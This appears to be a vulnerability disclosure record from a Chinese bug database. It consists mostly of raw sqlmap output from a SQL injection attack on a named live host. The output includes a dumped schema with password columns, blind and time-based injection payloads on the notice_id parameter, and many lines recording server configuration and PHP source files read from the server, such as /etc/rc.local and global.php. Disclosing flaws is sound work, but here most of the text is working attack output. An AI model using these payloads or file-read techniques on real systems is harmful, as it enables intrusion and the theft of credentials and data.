add_time | datetime | | audit | enum('Y','N','X') | | commits | varchar(10) | | end_time | date | | id | int(11) | | master_name | varchar(20) | | money_type | tinyint(2) | | order_by | varchar(5) | | show_type | varchar(1) | | start_time | date | +-------------+-------------------+ Database: v5 Table: web_user_url [8 columns] +---------------------+--------------+ | Column | Type | +---------------------+--------------+ | baidu_date | date | | baidu_record | varchar(20) | | id | int(10) | | is_first | tinyint(3) | | pr | tinyint(2) | | url | varchar(256) | | user_name | varchar(20) | | web_ad_out_links_id | int(10) | +---------------------+--------------+ Database: v5 Table: ad_count [6 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | ad_date | date | | ad_id | int(11) | | ad_ip_num | int(10) | | ad_num | int(10) | | ad_type | varchar(50) | | id | int(11) | +-----------+-------------+ Database: v5 Table: v5_worker [6 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | company_id | int(11) | | id | int(11) | | is_admin | tinyint(4) | | name | varchar(100) | | passwd | varchar(40) | | worker_id | varchar(20) | +------------+--------------+ Database: v5 Table: gggj_ad_old [13 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_code | text | | ad_content | varchar(50) | | ad_name | varchar(50) | | ad_price | float | | ad_url | text | | add_time | date | | audit | enum('Y','N','X') | | commits | varchar(10) | | end_time | date | | id | int(11) | | master_name | varchar(11) | | money_type | tinyint(2) | | start_time | date | +-------------+-------------------+ Database: v5 Table: v5_agent_oper [30 columns] +----------------+---------------------+ | Column | Type | +----------------+---------------------+ | active_money | float(10,2) | | addr | varchar(150) | | city | varchar(20) | | city_center | tinyint(3) unsigned | | city_discount | float unsigned | | city_name | varchar(30) | | discount | float unsigned | | email | varchar(100) | | fix_money | float(10,2) | | id | int(10) unsigned | | is_zongdai | tinyint(3) unsigned | | kf_name | int(8) | | money | float(10,2) | | msg | tinyint(3) unsigned | | name | varchar(50) | | new_add_money | float(10,2) | | new_add_month | varchar(7) | | oper_name | varchar(20) | | oper_pwd | varchar(50) | | pass | tinyint(3) unsigned | | phone | varchar(50) | | receipt_money | float(10,2) | | reg_date | datetime | | see_agent_user | tinyint(3) | | style_lock | tinyint(3) unsigned | | tm | varchar(50) | | type | tinyint(3) unsigned | | zdygg | tinyint(3) unsigned | | zdylogo | tinyint(3) unsigned | | zongdai_id | int(10) unsigned | +----------------+---------------------+ Database: v5 Table: gggj_adstat [6 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | ad_from | tinyint(2) | | ad_id | int(11) | | ad_time | datetime | | com_area | varchar(100) | | com_ip | varchar(20) | | domain_name | varchar(20) | +-------------+--------------+ Database: v5 Table: v5_company_talk_log [5 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | company_id | int(10) | | id | int(10) | | talk_date | datetime | | talk_ip | varchar(15) | | talk_url | varchar(100) | +------------+--------------+ Database: v5 Table: gggj_accountHistory [6 columns] +-------------+-------------+ | Column | Type | +-------------+-------------+ | account | varchar(40) | | add_person | varchar(11) | | add_time | datetime | | domain_name | varchar(50) | | id | int(11) | | moneNum | char(10) | +-------------+-------------+ Database: v5 Table: gggj_account [8 columns] +----------------+---------------+ | Column | Type | +----------------+---------------+ | account | varchar(50) | | account_from | varchar(20) | | account_person | varchar(11) | | account_type | char(10) | | add_time | datetime | | domain_name | varchar(50) | | id | int(11) | | is_select | enum('Y','N') | +----------------+---------------+ Database: v5 Table: out_links [7 columns] +-------------+---------------+ | Column | Type | +-------------+---------------+ | ad_user | varchar(25) | | add_time | datetime | | anchor_text | varchar(128) | | id | int(10) | | pr | tinyint(2) | | web_type | enum('0','1') | | web_url | varchar(50) | +-------------+---------------+ Database: v5 Table: user_infor [17 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | baidu_date | date | | baidu_record | varchar(20) | | com_name | varchar(128) | | connect | varchar(40) | | email | varchar(50) | | gm_sum | int(10) | | id | int(20) unsigned | | money | int(10) | | password | varchar(50) | | phone | varchar(20) | | pr | tinyint(2) | | qq | varchar(20) | | reg_sum | int(10) | | type | varchar(2) | | user_level | tinyint(2) | | user_name | varchar(20) | | website | varchar(50) | +--------------+------------------+ Database: v5 Table: cps_commission_log [8 columns] +----------------+------------------+ | Column | Type | +----------------+------------------+ | add_time | datetime | | company_id | int(10) unsigned | | cps_account | varchar(20) | | domain_name | varchar(20) | | id | int(20) | | money | decimal(10,2) | | recharge_money | decimal(10,2) | | remark | varchar(150) | +----------------+------------------+ Database: v5 Table: user_infor_xx [4 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | add_date | datetime | | id | int(20) | | user_id | int(20) | | xx_name | varchar(20) | +----------+-------------+ Database: v5 Table: ad_show [4 columns] +---------+---------+ | Column | Type | +---------+---------+ | ad_dbgg | int(20) | | ad_logo | int(20) | | ad_time | date | | id | int(20) | +---------+---------+ Database: v5 Table: web_ad_out_links [11 columns] +-----------------+-------------------+ | Column | Type | +-----------------+-------------------+ | add_time | datetime | | delete_by | enum('2','1','0') | | delete_time | datetime | | end_time | datetime | | id | int(10) | | money_clearing | datetime | | out_links_id | varchar(10) | | start_time | datetime | | status | enum('0','1','2') | | web_user | varchar(25) | | web_user_url_id | int(10) | +-----------------+-------------------+ Database: v5 Table: sendemail_record [10 columns] +----------+------------------------------+ | Column | Type | +----------+------------------------------+ | addtime | int(11) | | content | varchar(225) | | endtime | int(11) | | mail_id | int(11) | | receiver | varchar(225) | | report | text | | sendtime | int(11) | | status | enum('wait','sending','end') | | title | varchar(225) | | type | enum('1','2','3') | +----------+------------------------------+ Database: v5 Table: mailqueue [9 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | charset | char(4) | | content | mediumtext | | from1 | varchar(100) | | fromname | varchar(255) | | id | int(11) | | reply | varchar(100) | | status | tinyint(4) | | subject | varchar(255) | | to1 | varchar(255) | +----------+--------------+ Database: v5 Table: gggj_master_user [13 columns] +----------+---------------+ | Column | Type | +----------+---------------+ | com_name | varchar(100) | | gg_type | varchar(20) | | id | int(50) | | is_proxy | enum('N','Y') | | mail | varchar(20) | | mobile | varchar(20) | | name | varchar(10) | | pass | char(50) | | person | varchar(20) | | phone | varchar(20) | | remark | text | | type | char(10) | | url | varchar(100) | +----------+---------------+ Database: v5 Table: gggj_config [3 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | config_id | varchar(20) | | config_value | text | | domain_name | varchar(50) | +--------------+-------------+ Database: v5 Table: id_record [3 columns] +-----------+----------+ | Column | Type | +-----------+----------+ | id | int(20) | | last_date | datetime | | last_id | int(10) | +-----------+----------+ Database: v5 Table: v5_company_config [3 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | company_id | int(11) | | config_id | varchar(20) | | config_value | text | +--------------+-------------+ Database: v5 Table: conf_ip1 [6 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | area | char(30) | | city | char(30) | | city_cn | char(30) | | end_ip | bigint(20) unsigned | | isp | char(30) | | start_ip | bigint(20) unsigned | +----------+---------------------+ Database: v5 Table: gggj_require [10 columns] +--------------+---------------+ | Column | Type | +--------------+---------------+ | add_date | datetime | | add_fujian | varchar(255) | | add_solution | text | | add_user | int(10) | | audit | enum('Y','N') | | audit_day | datetime | | content | text | | id | int(10) | | master_name | varchar(25) | | title | varchar(50) | +--------------+---------------+ Database: v5 Table: official_adstat [6 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | ad_from | tinyint(2) | | ad_id | int(11) | | ad_time | datetime | | com_area | varchar(100) | | com_ip | varchar(20) | | domain_name | varchar(20) | +-------------+--------------+ Database: v5 Table: kf_tuo [8 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | ad_id | int(10) | | ad_type | varchar(10) | | area | varchar(100) | | come_date | datetime | | come_ip | varchar(20) | | come_url | varchar(250) | | id | int(10) | | user_id | int(10) | +-----------+--------------+ Database: v5 Table: ad_show_js [4 columns] +---------+---------+ | Column | Type | +---------+---------+ | ad_dbgg | int(20) | | ad_logo | int(20) | | ad_time | date | | id | int(20) | +---------+---------+ Database: v5 Table: cps_user [13 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | balance | float(10,2) | | cash_frozen_money | float(10,2) | | company_url | varchar(50) | | contact_name | varchar(50) | | cust_id | varchar(20) | | id | int(20) | | is_checked | tinyint(2) | | is_verified | tinyint(2) | | mobile | varchar(11) | | pwd | varchar(50) | | qq | varchar(11) | | reg_num | int(10) | | user_name | varchar(100) | +-------------------+--------------+ Database: v5 Table: cps_user_account [9 columns] +-------------------+------------------+ | Column | Type | +-------------------+------------------+ | add_time | datetime | | balance | float(10,2) | | cash_frozen_money | float(10,2) | | cust_id | varchar(20) | | exact_io_type | int(10) unsigned | | id | int(20) | | io_remark | text | | io_type | tinyint(2) | | money | float(10,2) | +-------------------+------------------+ Database: v5 Table: gggj_user_config [4 columns] +-------------+-------------+ | Column | Type | +-------------+-------------+ | ad_id | int(11) | | ad_order | int(4) | | ad_pos | int(2) | | domain_name | varchar(50) | +-------------+-------------+ Database: v5 Table: gggj_master_type [2 columns] +---------+-------------+ | Column | Type | +---------+-------------+ | gg_type | varchar(10) | | id | int(10) | +---------+-------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /etc/rc.local file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_etc_rc.local' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /usr/local/apache2/conf/httpd.conf file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_usr_local_apache2_conf_httpd.conf' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/union_notice.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_cps_www_union_notice.php' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/include/global.php--threads=10 file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/include/global.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_cps_www_include_global.php' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/index.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_index.php' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/adv/www/cps/www/config/cps_config.php file saved to:None sqlmap identified the following injection points with a total of 0 HTTP ### 漏洞证明: [<img src="https://images.seebug.org/upload/201209/29184704653190bd59723b08398c08db947e4c7d.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/29184704653190bd59723b08398c08db947e4c7d.png) [<img src="https://images.seebug.org/upload/201209/29184717050a3199e90a5f4ecd0ab4c5e961d952.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/29184717050a3199e90a5f4ecd0ab4c5e961d952.png)
漏洞利用/PoC
受影响的平台与产品
消息提示
- 添加资源
- 收藏资源
- 问题反馈
贡献用户
- 暂无贡献用户
相关漏洞清单
- 暂无相关漏洞